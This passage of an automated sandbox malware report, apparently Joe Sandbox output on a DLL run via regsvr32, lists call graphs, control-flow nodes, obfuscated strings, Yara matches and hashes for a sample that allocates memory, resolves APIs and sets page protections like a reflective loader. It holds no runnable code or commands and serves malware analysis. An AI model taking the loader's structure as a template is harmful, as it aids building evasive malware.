_calloc_dbg_impl 16567->16570 16569 7ffc65cfd63e 16568->16569 16572 7ffc65cfd67c _calloc_dbg_impl 16568->16572 16571 7ffc65cfbd70 _invalid_parameter 17 API calls 16569->16571 16570->16558 16571->16570 16572->16570 16573 7ffc65cfbd70 _invalid_parameter 17 API calls 16572->16573 16573->16570 16575 7ffc65cf8010 16574->16575 16576 7ffc65cf800e 16574->16576 16577 7ffc65cfbe00 _invalid_parameter 16 API calls 16575->16577 16576->16558 16577->16576 16579 7ffc65cf9c2a 16578->16579 16588 7ffc65cf9b10 16579->16588 16581 7ffc65cf9c34 16592 7ffc65cf9f20 16581->16592 16583 7ffc65cf9c51 16585 7ffc65cf9ecd 16583->16585 16598 7ffc65cfa000 16583->16598 16585->16561 16586 7ffc65cf9ce8 16586->16585 16611 7ffc65cf9360 LeaveCriticalSection 16586->16611 16590 7ffc65cf9b19 16588->16590 16589 7ffc65cf9bde 16589->16581 16590->16589 16612 7ffc65cf9360 LeaveCriticalSection 16590->16612 16593 7ffc65cf9f49 16592->16593 16594 7ffc65cf9f5b GetOEMCP 16593->16594 16595 7ffc65cf9f81 16593->16595 16597 7ffc65cf9f79 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16594->16597 16596 7ffc65cf9f88 GetACP 16595->16596 16595->16597 16596->16597 16597->16583 16599 7ffc65cf9f20 __initmbctable 2 API calls 16598->16599 16601 7ffc65cfa028 16599->16601 16600 7ffc65cfa039 __initmbctable 16603 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16600->16603 16601->16600 16602 7ffc65cfa234 16601->16602 16607 7ffc65cfa08e __initmbctable 16601->16607 16602->16600 16604 7ffc65cfa25d IsValidCodePage 16602->16604 16605 7ffc65cfa470 16603->16605 16604->16600 16606 7ffc65cfa27b GetCPInfo 16604->16606 16605->16586 16606->16600 16610 7ffc65cfa295 __initmbctable 16606->16610 16608 7ffc65cfa5e0 __initmbctable 19 API calls 16607->16608 16608->16600 16613 7ffc65cfa5e0 GetCPInfo 16610->16613 16611->16585 16612->16589 16614 7ffc65cfa61f 16613->16614 16622 7ffc65cfa7dc 16613->16622 16617 7ffc65cff4d0 _CrtMemDumpAllObjectsSince_stat 3 API calls 16614->16617 16615 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16616 7ffc65cfaa30 16615->16616 16616->16600 16618 7ffc65cfa734 16617->16618 16624 7ffc65cfef00 16618->16624 16620 7ffc65cfa788 16621 7ffc65cfef00 __initmbctable 7 API calls 16620->16621 16621->16622 16622->16615 16623 7ffc65cfa80a 16622->16623 16623->16600 16625 7ffc65cfef2c _CrtMemDumpAllObjectsSince 16624->16625 16628 7ffc65cfefb0 16625->16628 16627 7ffc65cfef8e _LocaleUpdate::~_LocaleUpdate 16627->16620 16629 7ffc65cfefd4 __initmbctable 16628->16629 16630 7ffc65cff068 MultiByteToWideChar 16629->16630 16634 7ffc65cff0ac malloc _MarkAllocaS 16630->16634 16636 7ffc65cff0a5 _CrtMemDumpAllObjectsSince_stat 16630->16636 16631 7ffc65cff122 MultiByteToWideChar 16632 7ffc65cff164 LCMapStringW 16631->16632 16631->16636 16633 7ffc65cff1a8 16632->16633 16632->16636 16635 7ffc65cff1b8 16633->16635 16642 7ffc65cff222 malloc _MarkAllocaS 16633->16642 16634->16631 16634->16636 16635->16636 16637 7ffc65cff1d9 LCMapStringW 16635->16637 16636->16627 16637->16636 16638 7ffc65cff2ac LCMapStringW 16638->16636 16639 7ffc65cff2ea 16638->16639 16640 7ffc65cff2f4 WideCharToMultiByte 16639->16640 16641 7ffc65cff341 WideCharToMultiByte 16639->16641 16640->16636 16641->16636 16642->16636 16642->16638 17735 7ffc65d014e1 17736 7ffc65d01520 DecodePointer 17735->17736 17737 7ffc65d014ef DecodePointer 17735->17737 17738 7ffc65d01540 17736->17738 17737->17736 17740 7ffc65d0150f 17737->17740 17739 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17738->17739 17741 7ffc65d0157a 17739->17741 17740->17736 16648 7ffc65cf35e1 16650 7ffc65cf35f1 16648->16650 16653 7ffc65cf35ea 16648->16653 16650->16653 16654 7ffc65cf12b0 16650->16654 16652 7ffc65cf12b0 14 API calls 16652->16653 16655 7ffc65cf12de CoLoadLibrary 16654->16655 16660 7ffc65cf2f8c 16654->16660 16657 7ffc65cf2f2e VirtualAlloc RtlAllocateHeap 16655->16657 16658 7ffc65cf2f0f MessageBoxA ExitProcess 16655->16658 16656 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16661 7ffc65cf30ff 16656->16661 16659 7ffc65cf2f73 _calloc_dbg_impl 16657->16659 16657->16660 16662 7ffc65cf2f83 RtlDeleteBoundaryDescriptor 16659->16662 16660->16656 16661->16652 16661->16653 16662->16660 17312 7ffc65d05de0 17317 7ffc65cf3170 17312->17317 17316 7ffc65d05e86 17318 7ffc65cf31ac 17317->17318 17319 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17318->17319 17320 7ffc65cf3263 17319->17320 17320->17316 17321 7ffc65cf3870 17320->17321 17322 7ffc65cf39db __SehTransFilter 17321->17322 17323 7ffc65cf38de __SehTransFilter 17321->17323 17322->17316 17323->17322 17324 7ffc65cf3a71 RtlUnwindEx 17323->17324 17324->17322 17742 7ffc65d048e0 17743 7ffc65d048f7 std::bad_exception::~bad_exception 17742->17743 17744 7ffc65d0490c 17743->17744 17746 7ffc65d0d710 17743->17746 17747 7ffc65d0d721 17746->17747 17748 7ffc65d0d726 17746->17748 17747->17744 17750 7ffc65cf9360 LeaveCriticalSection 17748->17750 17750->17747 18335 7ffc65cf3fe1 18336 7ffc65cf3fea SetLastError 18335->18336 16237 7ffc65cf3599 16240 7ffc65cf8900 16237->16240 16239 7ffc65cf359e 16241 7ffc65cf8936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16240->16241 16242 7ffc65cf8920 16240->16242 16243 7ffc65cf89de 16241->16243 16242->16239 16243->16242 16244 7ffc65cf4399 16245 7ffc65cf43a6 16244->16245 16247 7ffc65cf4377 16244->16247 16247->16244 16247->16245 16248 7ffc65cfabb0 DecodePointer 16247->16248 16249 7ffc65cfabd3 16248->16249 16249->16247 17762 7ffc65d0809f 17763 7ffc65d08145 _calloc_dbg_impl 17762->17763 17765 7ffc65d080b0 _calloc_dbg_impl 17762->17765 17764 7ffc65cfbd70 _invalid_parameter 17 API calls 17763->17764 17763->17765 17764->17765 17766 7ffc65d0d4a0 17767 7ffc65d0d4b7 std::bad_exception::~bad_exception 17766->17767 17768 7ffc65d0d4cc 17767->17768 17769 7ffc65d0d710 _Ref_count LeaveCriticalSection 17767->17769 17769->17768 18341 7ffc65d0a7a0 18347 7ffc65d0a61f 18341->18347 18342 7ffc65d0a726 WideCharToMultiByte 18343 7ffc65d0a791 GetLastError 18342->18343 18342->18347 18349 7ffc65d0a887 _dosmaperr __doserrno 18343->18349 18344 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18346 7ffc65d0a9f5 18344->18346 18345 7ffc65d0a7b0 WriteFile 18345->18347 18348 7ffc65d0a857 GetLastError 18345->18348 18347->18342 18347->18345 18347->18349 18348->18347 18349->18344 18868 7ffc65d02695 18869 7ffc65d026a0 18868->18869 18870 7ffc65cfbd70 _invalid_parameter 17 API calls 18869->18870 18871 7ffc65d026ab 18869->18871 18870->18871 18872 7ffc65d04a95 18873 7ffc65d04aad __SehTransFilter 18872->18873 18874 7ffc65d04c2b 18873->18874 18875 7ffc65d05180 __SehTransFilter 38 API calls 18873->18875 18875->18874 17334 7ffc65d0c1a3 17335 7ffc65d0c1b0 get_int64_arg 17334->17335 17336 7ffc65d0b99c 17335->17336 17345 7ffc65d0b530 17335->17345 17337 7ffc65d0cc93 17336->17337 17341 7ffc65d0bada 17336->17341 17338 7ffc65cfbd70 _invalid_parameter 17 API calls 17337->17338 17340 7ffc65d0bb0e _LocaleUpdate::~_LocaleUpdate 17337->17340 17338->17340 17342 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17340->17342 17344 7ffc65cfbd70 _invalid_parameter 17 API calls 17341->17344 17343 7ffc65d0cd90 17342->17343 17344->17340 17348 7ffc65d0b090 17345->17348 17347 7ffc65d0b56c 17347->17335 17349 7ffc65d0b0b7 17348->17349 17350 7ffc65d0b168 17349->17350 17352 7ffc65d0b1a6 _CrtMemDumpAllObjectsSince 17349->17352 17357 7ffc65d0b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 17349->17357 17351 7ffc65cfbd70 _invalid_parameter 17 API calls 17350->17351 17351->17357 17353 7ffc65d0b347 _CrtMemDumpAllObjectsSince 17352->17353 17356 7ffc65d0b1cf 17352->17356 17354 7ffc65d0b359 WideCharToMultiByte 17353->17354 17355 7ffc65d0b3ab 17354->17355 17355->17357 17358 7ffc65d0b3c1 GetLastError 17355->17358 17356->17357 17359 7ffc65cfbd70 _invalid_parameter 17 API calls 17356->17359 17357->17347 17358->17357 17360 7ffc65d0b3d0 _calloc_dbg_impl 17358->17360 17359->17357 17360->17357 17361 7ffc65cfbd70 _invalid_parameter 17 API calls 17360->17361 17361->17357 18358 7ffc65d05393 18359 7ffc65d053a0 18358->18359 18360 7ffc65d053b4 __SehTransFilter 18359->18360 18361 7ffc65d053cc 18359->18361 18367 7ffc65d054a0 RaiseException 18360->18367 18368 7ffc65d054a0 RaiseException 18361->18368 18363 7ffc65d053ca 18365 7ffc65cfed30 _FindAndUnlinkFrame 36 API calls 18363->18365 18366 7ffc65d053e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18365->18366 18367->18363 18368->18363 17362 7ffc65cf5991 17363 7ffc65cf5996 _calloc_dbg_impl 17362->17363 17366 7ffc65cfc020 17363->17366 17365 7ffc65cf59d5 17367 7ffc65cfc03b HeapFree 17366->17367 17368 7ffc65cfc039 _get_errno_from_oserr 17366->17368 17367->17368 17369 7ffc65cfc05a GetLastError 17367->17369 17368->17365 17369->17368 17370 7ffc65cfc990 17374 7ffc65cf4980 17370->17374 17372 7ffc65cfc9b8 EncodePointer 17373 7ffc65cfc9e5 17372->17373 17375 7ffc65cf49cb _calloc_dbg_impl 17374->17375 17375->17372 17783 7ffc65cfc080 HeapValidate 17784 7ffc65cfc0a2 17783->17784 18369 7ffc65d09fba 18375 7ffc65d09c4d 18369->18375 18370 7ffc65d0a06d WriteFile 18371 7ffc65d0a103 GetLastError 18370->18371 18370->18375 18376 7ffc65d09dd9 _dosmaperr __doserrno 18371->18376 18372 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18374 7ffc65d0a9f5 18372->18374 18373 7ffc65d09f66 WideCharToMultiByte 18373->18376 18377 7ffc65d09fbf WriteFile 18373->18377 18375->18370 18375->18373 18375->18376 18378 7ffc65d0fc00 WriteConsoleW CreateFileW _putwch_nolock 18375->18378 18380 7ffc65d0a158 GetLastError 18375->18380 18381 7ffc65d0f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 18375->18381 18382 7ffc65d0a1b5 GetLastError 18375->18382 18376->18372 18377->18375 18379 7ffc65d0a050 GetLastError 18377->18379 18378->18375 18379->18375 18379->18376 18380->18376 18381->18375 18382->18376 17393 7ffc65d0b580 17394 7ffc65d0b5fa 17393->17394 17395 7ffc65d0b676 17394->17395 17396 7ffc65d0b6cb 17394->17396 17398 7ffc65cfbd70 _invalid_parameter 17 API calls 17395->17398 17397 7ffc65d0afb0 _fflush_nolock 17 API calls 17396->17397 17399 7ffc65d0b6fe 17396->17399 17397->17399 17404 7ffc65d0b6aa _LocaleUpdate::~_LocaleUpdate 17398->17404 17400 7ffc65d0b84d 17399->17400 17406 7ffc65d0b8a2 17399->17406 17401 7ffc65cfbd70 _invalid_parameter 17 API calls 17400->17401 17401->17404 17402 7ffc65d0b915 17407 7ffc65cfbd70 _invalid_parameter 17 API calls 17402->17407 17403 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17405 7ffc65d0cd90 17403->17405 17404->17403 17406->17402 17410 7ffc65d0b96a 17406->17410 17407->17404 17408 7ffc65d0cc93 17408->17404 17409 7ffc65cfbd70 _invalid_parameter 17 API calls 17408->17409 17409->17404 17410->17408 17411 7ffc65d0bada 17410->17411 17412 7ffc65cfbd70 _invalid_parameter 17 API calls 17411->17412 17412->17404 17789 7ffc65cf10b0 17791 7ffc65cf10da 17789->17791 17790 7ffc65cf10fc 17793 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 17790->17793 17791->17790 17792 7ffc65cf1000 4 API calls 17791->17792 17792->17790 17794 7ffc65cf112c 17793->17794 17795 7ffc65cf5cad 17798 7ffc65cf5cb8 17795->17798 17797 7ffc65cf6201 17799 7ffc65cf5e1a _realloc_dbg 17798->17799 17800 7ffc65cf9360 LeaveCriticalSection 17798->17800 17800->17797 18383 7ffc65cf3faa 18384 7ffc65cf3e30 LeaveCriticalSection 18383->18384 18385 7ffc65cf3fb6 GetCurrentThreadId 18384->18385 18386 7ffc65cf3fea SetLastError 18385->18386 18387 7ffc65d0df8d 18388 7ffc65d0dfbb 18387->18388 18389 7ffc65d0eadf 18388->18389 18390 7ffc65d0eec0 25 API calls 18388->18390 18397 7ffc65d0da75 18388->18397 18391 7ffc65d0ef10 25 API calls 18389->18391 18390->18389 18392 7ffc65d0eafd 18391->18392 18393 7ffc65d0eb33 18392->18393 18395 7ffc65d0eec0 25 API calls 18392->18395 18394 7ffc65d0ec29 18393->18394 18408 7ffc65d0eb49 _CrtMemDumpAllObjectsSince 18393->18408 18396 7ffc65d0ef10 25 API calls 18394->18396 18395->18393 18398 7ffc65d0ebda 18396->18398 18399 7ffc65d0eca1 18397->18399 18403 7ffc65d0dbb5 18397->18403 18398->18397 18402 7ffc65d0eec0 25 API calls 18398->18402 18400 7ffc65cfbd70 _invalid_parameter 17 API calls 18399->18400 18404 7ffc65d0dbe9 _LocaleUpdate::~_LocaleUpdate 18399->18404 18400->18404 18401 7ffc65cf3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18405 7ffc65d0ed9e 18401->18405 18402->18397 18407 7ffc65cfbd70 _invalid_parameter 17 API calls 18403->18407 18404->18401 18406 7ffc65d0f000 wcsxfrm 2 API calls 18406->18408 18407->18404 18408->18398 18408->18406 18409 7ffc65d0ee40 25 API calls 18408->18409 18409->18408 16548 7ffc65cfaca8 16549 7ffc65cfacb2 16548->16549 16550 7ffc65cf74e0 __crtExitProcess 3 API calls 16549->16550 16551 7ffc65cfacbc RtlAllocateHeap 16550->16551 17801 7ffc65d02c9f 17802 7ffc65d02caf 17801->17802 17803 7ffc65d02ca6 17801->17803 17803->17802 17804 7ffc65cfbd70 _invalid_parameter 17 API calls 17803->17804 17804->17802

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocAllocateBoundaryDeleteDescriptorExitHeapLibraryLoadMessageProcessVirtual
                                                                                                                                            • String ID: %<$Ya]$g@$$|X$ 4bB$!@C+$"V2$#z$U$$931$$:*:$$D1v$$huN$$}%z$%8#$%</$%U9$&\hR$*hH%$+ong$+iT$-{*$-'C$.#($0kj.$0.3$1\u$2s<S$3ob$5qj'$5vCx$8<-$:!@$:'U@$:9m?$;qdf$<)@P$<M}O$<v:$=kf^$>~$?CE`$@ $BxJr$C/$Cb47$D)'U$Eekg$FLIn$HPZ$Ko*h$L ]1$M13U$M1vi$MDj$N1kj^H<M1vf@$_yiXP+o*hH*fZQl5vC5qjfXErgxjcCb4v_e75<edkge!z$U9k+h$P+oo$PX5$Puvm$QlyO$R;pB$S[L$S}pn$U+on$U9#($V#s$V9s$VO4$^*C$`AnM$aUJ'$c-_j$cDj$e7tc$ePO$gVWH$h78<$hx"$j+h$kxfc$l|f$mCl4$mbPv$pAT#$rkE@$t(O$tc`$w&ed$wC54$werfault.exe$wk/$xA\#${$U|${fM$$|e:$} z$$}'6$}WL$It$"!k$%Uc$(pd$*hH$,$n$,1.$9[+$?x?$EBg$M z$N3$Pl5$i~e$jfX$oE$`I
                                                                                                                                            • API String ID: 3056597726-2032897877
                                                                                                                                            • Opcode ID: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                                                                                            • Instruction ID: 6c12e0db026f5ce35fd51f6507722bb15a33345573f7523bc3c26520ea30d7ae
                                                                                                                                            • Opcode Fuzzy Hash: be2b6721a01229fe6d62131d54c2e067f3d2e24da2d5df3bb551e88fe72b0fff
                                                                                                                                            • Instruction Fuzzy Hash: 6CE2C8B690A7C5CFE3748F22AA817DD3AA0F345748F609608D3991FA1DCB795242CF85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 15 10e0000-10e0460 call 10e0aa8 * 2 VirtualAlloc 37 10e048a-10e0494 15->37 38 10e0462-10e0466 15->38 41 10e049a-10e049e 37->41 42 10e0a91-10e0aa6 37->42 39 10e0468-10e0488 38->39 39->37 39->39 41->42 43 10e04a4-10e04a8 41->43 43->42 44 10e04ae-10e04b2 43->44 44->42 45 10e04b8-10e04bf 44->45 45->42 46 10e04c5-10e04d2 45->46 46->42 47 10e04d8-10e04e1 46->47 47->42 48 10e04e7-10e04f4 47->48 48->42 49 10e04fa-10e0507 48->49 50 10e0509-10e0511 49->50 51 10e0531-10e0567 GetNativeSystemInfo 49->51 52 10e0513-10e0518 50->52 51->42 53 10e056d-10e0589 VirtualAlloc 51->53 54 10e051a-10e051f 52->54 55 10e0521 52->55 56 10e058b-10e059e 53->56 57 10e05a0-10e05ac 53->57 59 10e0523-10e052f 54->59 55->59 56->57 58 10e05af-10e05b2 57->58 61 10e05b4-10e05bf 58->61 62 10e05c1-10e05db 58->62 59->51 59->52 61->58 63 10e05dd-10e05e2 62->63 64 10e061b-10e0622 62->64 65 10e05e4-10e05ea 63->65 66 10e06db-10e06e2 64->66 67 10e0628-10e062f 64->67 68 10e05ec-10e0609 65->68 69 10e060b-10e0619 65->69 71 10e06e8-10e06f9 66->71 72 10e0864-10e086b 66->72 67->66 70 10e0635-10e0642 67->70 68->68 68->69 69->64 69->65 70->66 75 10e0648-10e064f 70->75 76 10e0702-10e0705 71->76 73 10e0917-10e0929 72->73 74 10e0871-10e087f 72->74 79 10e092f-10e0937 73->79 80 10e0a07-10e0a1a 73->80 81 10e090e-10e0911 74->81 82 10e0654-10e0658 75->82 77 10e06fb-10e06ff 76->77 78 10e0707-10e070a 76->78 77->76 83 10e070c-10e071d 78->83 84 10e0788-10e078e 78->84 86 10e093b-10e093f 79->86 99 10e0a1c-10e0a27 80->99 100 10e0a40-10e0a4a 80->100 81->73 85 10e0884-10e08a9 81->85 87 10e06c0-10e06ca 82->87 88 10e071f-10e0720 83->88 89 10e0794-10e07a2 83->89 84->89 117 10e08ab-10e08b1 85->117 118 10e0907-10e090c 85->118 93 10e09ec-10e09fa 86->93 94 10e0945-10e095a 86->94 91 10e06cc-10e06d2 87->91 92 10e065a-10e0669 87->92 98 10e0722-10e0784 88->98 101 10e085d-10e085e 89->101 102 10e07a8 89->102 91->82 103 10e06d4-10e06d5 91->103 95 10e067a-10e067e 92->95 96 10e066b-10e0678 92->96 93->86 97 10e0a00-10e0a01 93->97 105 10e095c-10e095e 94->105 106 10e097b-10e097d 94->106 108 10e068c-10e0690 95->108 109 10e0680-10e068a 95->109 107 10e06bd-10e06be 96->107 97->80 98->98 112 10e0786 98->112 113 10e0a38-10e0a3e 99->113 115 10e0a4c-10e0a54 100->115 116 10e0a7b-10e0a8e 100->116 101->72 114 10e07ae-10e07d4 102->114 103->66 119 10e096e-10e0979 105->119 120 10e0960-10e096c 105->120 110 10e097f-10e0981 106->110 111 10e09a2-10e09a4 106->111 107->87 129 10e06a5-10e06a9 108->129 130 10e0692-10e06a3 108->130 126 10e06b6-10e06ba 109->126 127 10e0989-10e098b 110->127 128 10e0983-10e0987 110->128 131 10e09ac-10e09bb 111->131 132 10e09a6-10e09aa 111->132 112->89 113->100 123 10e0a29-10e0a35 113->123 142 10e07d6-10e07d9 114->142 143 10e0835-10e0839 114->143 115->116 124 10e0a56-10e0a79 RtlAddFunctionTable 115->124 116->42 121 10e08bb-10e08c8 117->121 122 10e08b3-10e08b9 117->122 118->81 125 10e09be-10e09bf 119->125 120->125 134 10e08ca-10e08d1 121->134 135 10e08d3-10e08e5 121->135 133 10e08ea-10e08fe 122->133 123->113 124->116 140 10e09c5-10e09cb 125->140 126->107 127->111 138 10e098d-10e098f 127->138 128->125 129->107 139 10e06ab-10e06b3 129->139 130->126 131->125 132->125 133->118 153 10e0900-10e0905 133->153 134->134 134->135 135->133 144 10e0999-10e09a0 138->144 145 10e0991-10e0997 138->145 139->126 146 10e09cd-10e09d3 140->146 147 10e09d9-10e09e9 VirtualProtect 140->147 149 10e07db-10e07e1 142->149 150 10e07e3-10e07f0 142->150 151 10e083b 143->151 152 10e0844-10e0850 143->152 144->140 145->125 146->147 147->93 154 10e0812-10e082c 149->154 155 10e07fb-10e080d 150->155 156 10e07f2-10e07f9 150->156 151->152 152->114 157 10e0856-10e0857 152->157 153->117 154->143 159 10e082e-10e0833 154->159 155->154 156->155 156->156 157->101 159->142
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.322978795.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_10e0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                            • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                            • API String ID: 394283112-2517549848
                                                                                                                                            • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                            • Instruction ID: 0e409fde6f3be837474164f1f6a504d27a433caa6cf89986075bafb034077c35
                                                                                                                                            • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                            • Instruction Fuzzy Hash: 5372F430618B4C8FDB69DF19C8896BAB7E1FB98304F14462EE8CAC7215DB74D542CB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 220 18002b7b2-18002b823 call 1800075b8 222 18002b828-18002b836 220->222 223 18002b83c-18002b848 222->223 224 18002b769-18002b76f 223->224 225 18002b775 224->225 226 18002b9bc-18002b9c2 224->226 227 18002b77b-18002b781 225->227 228 18002be19-18002be67 call 180024104 225->228 229 18002bdb2-18002bdfb call 180024104 226->229 230 18002b9c8-18002b9ce 226->230 231 18002b9b2-18002b9b7 227->231 232 18002b787-18002b78d 227->232 243 18002be6c-18002be8c 228->243 250 18002be00-18002be09 229->250 233 18002b9d4-18002b9da 230->233 234 18002bc32-18002bdb0 call 180003a18 call 18001958c 230->234 231->224 238 18002b793-18002b799 232->238 239 18002b91c-18002b9a3 call 18001a6a8 232->239 240 18002bb99-18002bc22 call 180029374 233->240 241 18002b9e0-18002b9e6 233->241 234->250 246 18002b867-18002b917 call 180029374 238->246 247 18002b79f-18002b7a5 238->247 253 18002b9a8-18002b9ad 239->253 240->243 260 18002bc28-18002bc2d 240->260 248 18002be0c-18002be12 241->248 249 18002b9ec-18002bafc call 180018fd8 241->249 246->223 255 18002b7ab-18002b7b1 247->255 256 18002b84d-18002b862 247->256 248->243 258 18002be14 248->258 249->253 264 18002bb02-18002bb94 call 180013fc0 249->264 250->248 253->223 255->220 255->248 256->224 258->224 260->223 264->223
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: j$BaG$E^7$i1V$m?${=/
                                                                                                                                            • API String ID: 0-1718370006
                                                                                                                                            • Opcode ID: 7215d537d5299d177d4048e19a4dae45df63305aab7e83eff15929c82d00da66
                                                                                                                                            • Instruction ID: c2786c6f7bce021451845d5168b6505f680b7f0c5368ce25f063ff62f9696b2b
                                                                                                                                            • Opcode Fuzzy Hash: 7215d537d5299d177d4048e19a4dae45df63305aab7e83eff15929c82d00da66
                                                                                                                                            • Instruction Fuzzy Hash: 64223B70E4870DDBCB59DFA8C4AA6DEBBF6FB44344F0081A9D805A7290DB74560ACB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 317 180005c74-180005c95 318 180005c9c 317->318 319 180005ca1-180005ca7 318->319 320 180005cad-180005cb3 319->320 321 180006140-180006182 call 1800127b8 319->321 323 180005f91-18000613b call 180029374 * 2 320->323 324 180005cb9-180005cbf 320->324 332 180006187 321->332 323->318 327 180005cc5-180005cc7 324->327 328 180005e3e-180005f13 call 18000529c call 18000d9a8 324->328 329 180005d72-180005e23 call 180007284 327->329 330 180005ccd-180005cd3 327->330 348 180005f18-180005f8c call 180029480 328->348 346 180005e34-180005e39 329->346 347 180005e25-180005e2f 329->347 334 180005cd9-180005d62 call 180024104 * 2 330->334 335 18000618c-180006192 330->335 332->335 342 180005d67-180005d71 334->342 335->342 343 180006198 335->343 343->319 346->318 347->318 348->332
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: $E$&C$b $z_o^$]o-
                                                                                                                                            • API String ID: 0-182765021
                                                                                                                                            • Opcode ID: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                                                                                                            • Instruction ID: b82cae2a5c5b3167ef3d8ad315f999371e1e8449cd72bf967428ee4211bfb190
                                                                                                                                            • Opcode Fuzzy Hash: fd2830ddd061059d70b3ed5c5ef2773e5c4c00071749e16c1f80641060217d81
                                                                                                                                            • Instruction Fuzzy Hash: 5CE1277151468CDFDF88DF28C889ADD3BA1FB483A8F956219FD0A97250D774D888CB84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 8$?I $k?@`${>K$s
                                                                                                                                            • API String ID: 0-923624899
                                                                                                                                            • Opcode ID: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                                                                                                            • Instruction ID: ebffd08f5432af4d9268e2276ec0df8890e8c351c8fd12e1d0a52c84a5ba0a07
                                                                                                                                            • Opcode Fuzzy Hash: 59fac920170ce31af9fc739010187020a0354a51edcd4550f4f509655bae4bf8
                                                                                                                                            • Instruction Fuzzy Hash: F4C1F070519784ABC388DF24C4CA95BBBF1FBD4758F906A1CF9C68A260D774D948CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
